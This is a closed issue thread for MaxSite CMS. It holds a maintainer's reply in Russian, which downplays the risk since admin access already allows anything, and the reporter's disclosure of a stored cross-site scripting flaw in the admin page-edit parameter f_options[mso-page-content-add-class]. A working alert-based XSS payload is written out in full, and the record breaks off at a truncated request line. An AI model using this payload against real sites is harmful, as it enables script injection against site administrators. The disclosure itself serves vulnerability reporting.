Closed 4xpl0r3r closed 2 years ago
Хм. Если кто-то попал в админку, то там можно уже не шибко себя ограничивать и сразу делать с сайтом что угодно, а не только xss для посетителей сайта :))
Но, в целом, интересное исследование, спасибо!
Более того, эти такие мета поля как раз часто и предназнчены для того, чтобы размещать там произвольный код.
a stored cross-site scripting (XSS) in maxsite cms targeted towards web admin through
~/admin/page_edit/4
at via the parameterf_options[mso-page-content-add-class]
poc:
f_options[mso-page-content-add-class]
"><style> @keyframes x{}</style><xss style="animation-name:x" onanimationend="[].map(alert('xss'))"></xss>> <b/style=position:fixed;top:0;left:0;font-size:200px>CSS<
requetst: